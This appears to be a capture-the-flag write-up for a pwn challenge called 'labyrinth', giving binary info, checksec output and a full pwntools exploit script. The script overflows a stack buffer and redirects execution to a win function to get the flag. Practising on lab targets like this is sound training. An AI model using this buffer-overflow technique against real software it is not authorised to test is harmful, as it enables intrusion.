You find yourself trapped in a mysterious labyrinth, with only one chance to escape. Choose the correct door wisely, for the wrong choice could have deadly consequences.
Check file info and binary protections.
Copy file labyrinth
labyrinth: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./glibc/ld-linux-x86-64.so.2, BuildID[sha1]=86c87230616a87809e53b766b99987df9bf89ad8, for GNU/Linux 3.2.0, not stripped
Copy checksec --file labyrinth
[ * ] '/home/crystal/Desktop/htb/challenge/labyrinth'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b './glibc/'
Copy from pwn import *
# Allows you to switch between local/GDB/remote from terminal
def start ( argv = [] , * a , ** kw ):
if args . GDB : # Set GDBscript below
return gdb . debug ([exe] + argv, gdbscript = gdbscript, * a, ** kw)
elif args . REMOTE : # ('server', 'port')
return remote (sys.argv[ 1 ], sys.argv[ 2 ], * a, ** kw)
else : # Run locally
return process ([exe] + argv, * a, ** kw)
# Specify GDB script here (breakpoints etc)
gdbscript = '''
init-pwndbg
break *0x401602
continue
''' . format ( ** locals ())
# Binary filename
exe = './labyrinth'
# This will automatically get context arch, bits, os etc
elf = context . binary = ELF (exe, checksec = False )
# Change logging level to help with debugging (error/warning/info/debug)
context . log_level = 'debug'
# ===========================================================
# EXPLOIT GOES HERE
# ===========================================================
# Offset to RIP
offset = 64
# Start program
io = start ()
ret = 0x 401016
# Build the payload
payload = flat ([
b 'C' * (offset - 8 ),
ret, # stack alignment
elf.symbols.escape_plan
])
# Pass initial checks
io . sendlineafter ( b '>' , b '069' )
# Send the payload
io . sendlineafter ( b '>' , payload)
# Got Flag?
io . recvuntil ( b 'journey:' )
warn (io. recvlines ( 2 )[ 1 ]. decode ()) 